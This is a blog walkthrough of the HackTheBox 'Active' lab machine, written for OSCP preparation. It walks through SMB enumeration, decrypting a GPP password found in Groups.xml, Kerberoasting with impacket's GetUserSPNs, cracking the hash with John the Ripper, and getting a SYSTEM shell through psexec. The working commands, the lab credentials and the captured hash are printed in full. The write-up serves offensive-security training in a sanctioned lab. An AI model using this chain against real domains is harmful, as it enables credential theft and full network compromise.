Follow along in my OSCP journey, this is my target 6 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.100Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-01-10 23:13:40Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-Fi
rst-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-Fi
rst-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5722/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49169/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49170/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49182/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCThis machine is really nice because there are a lot of services and going through the process of checking them out will help you filter them in the future. We got services running such as SMB, Kerberos, LDAP. Let’s focus on these 3 and then explore the rest if we don’t find a path through these.
SMB—139,445
What are the permissions on the drives?
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Looks like there might be interesting things to look at in the replication drive.
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
SYSVOL NO ACCESS Logon server share
Users NO ACCESSHINT
Lookup any know possible mistakes that are often seen for AD Groups description. And make sure to not miss anything in the drive.
.
.
.
.
We find the Groups.xml file which is known to sometimes hold users' credentials.
We tried downloading it but only the “more” command worked.
Since it seems we can’t download it, let’s try to open it directly in the SMB CLI.
<?xml version="1.0" encoding="utf-8"?> <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User> </Groups>So we find the SVC_TGS credentials:
SVC_TGS:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
HINT
This is an odd password but we can’t really use it in that form. At least we know where we got it from …
.
.
.
.
Kali has a tool to decrypt the GPP passwords, also the reason we can decrypt it is that the encryption key is public.
Now we have usable credentials:
SVC_TGS:GPPstillStandingStrong2k18
What can we do with those credentials now?
Let’s leverage them with SMB and Kerberos
SMB
smbclient \\\\active.htb\\Users -U SVC_TGSWe’re in!
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018smb: \SVC_TGS\Desktop\> get user.txt
Error opening local file user.txt
smb: \SVC_TGS\Desktop\> more user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as /tmp/smbmore.28Ym0X (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
We look for interesting things but we only find the flag as consolation.
Kerberos
HINT
What technique will allow us to use the credentials we have with kerberos?
.
.
.
.
Kerberoasting!!!! (https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/)
Let’s use the GetUserSPNs python script from the impacket project to help us extract the hashes
python3 /opt/impacket/examples/GetUserSPNs.py <domain>/<user>:<password> -dc-ip <ip>Let’s run the command
sudo python3 /opt/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$9d179d34b671cedefad1faf2b2058d52$e8daccccecfac9f17b69966a9c334760767724c29a126bda049947e01a4d8c6a8a5c89bb67f7900d16613991cb930c1fb5b9eeb1d21704580308c353b6bfa58a9a9b1390a2859b6afc39ad998bbb019d9bb989b37756c6d9e6f5b43b430e1fdc1ca7200d6ffd38438f306f84ae12b699a9e71142c76a23c6eac90fb9335d4e7ec9878e75ff727cc17c9fc405a6da2c4990938ace1a2a6fa56c45c92379c4d08bb9fb4a937c0eb6353f824a4a892cf75ed0b47f02d58fdffc20cfd97aa6de019bcc79954908147531260127733a555e5a442e1a9ae718e064b745c6f33a90b976b495abb3cd875b502c4b5c92e503791dedf0690d00edf9f0173e5430bd2ec01f4ce67bfdebaeeb896f410e87fa1fe814a6098b9afca5d08bb8bde639db060f4d7357590563bef7ed549f75014389a0e192caa73d0a121fee1296f24a3c2e541895f59aed6dab40aecaa0ef8d334897ae63061a7b4f97c09477f69b0da064a5c479f2647aefa51af07be3c7cc5966a8770ca6b412635b6134d078a57edd4b0aa4b9e611ad14c6ac41892493d9c75b384a27f2ced6be6c82fbd1de36c06cdd7c63bc30b160c63db49597faf78b189a82b66ac4a42bccf20c8612dcd9704ba9b2532dd75fb70539e0feb2b9b97b42970d8e258d9d7cc3eec735ee62f2bd2cdcbccf02b7ab2334db22eae6303627df2b5281de650ca95aedd5f24bc4e398ee181376e91940d34b7f11f217f6c42f9e4855430a6008fc8460dbffe209b227663f7bc28a03c8fc7eb2d6c0489892e61a012e3e8095a0780aa32af99312ad36afdbf4c607c9dec89ba53a4da1cf24af3f06ab82e8d268cd6334d998c073d3f8124b3ca7b165a0c9bffcd3fae6a75c4092c388ff9f452dcf23e42e4aa979e3a39c3ff9da8f9c0d3d0581be1ffffd1e148dbeeea3a9c9dcc4df6a97ca955f5e5a9e5f78024c56307364531e3ef0d89eac5708da5f6baa14a5fc827bd471f3c298ceb5c7e6df6397c297d9e81a9c24632409778fe225eafe61c7383faaa4bce5d08c210aa389c2e1ab0afb948502e30b3f54e282313f08ed37dbba2a90b8df2928db83862122a2e951add202e09f9b200e1781bf3e9083286c8799043095dca73a1c173e8dd0b4f20136f63bd463baa37e2554f7186cd13e8b5a49ca2f8db7c5c53ba61d0e997dc095563eb7c04d52b122acd54ab6bec0517a6897b5ab782def39fb37694b181294ec4393e1fd65e7602d5bd4fc8b7780a9e7d8266052311dHell yeah! We got the admin’s hash.
Time to crack that hash!
John the Ripper
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtWe got the admin’s password: Administrator:Ticketmaster1968
HINT
I ask again, what can we do with those admin creds now 😉
.
.
.
.
PSEXEC!!!
psexec.py active.htb/Administrator:Ticketmaster1968@active.htb
Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies
[*] Trying protocol 445/SMB...[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WorAsBXC.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service eYpy on active.htb.....
[*] Starting service eYpy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoami
nt authority\system
We are NT authority System, that is GG and we can grab our root flag
C:\Users\Administrator\Desktop>more root.txtWhat did I learn?
- We learned about SMB enumeration, listing the shares available and their permissions. We also learned about connecting to the service and use the recurse capability to rapidly output all the shares.
- We found out about GPP passwords and the private key that is publicly available which allowed us to decrypt it.
- We learned about the concept of kerberoasting, how to use service account credentials to pull hashes from other users.
- We learned how to use windows user credentials when SSH isn’t available utilizing PSexec.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.
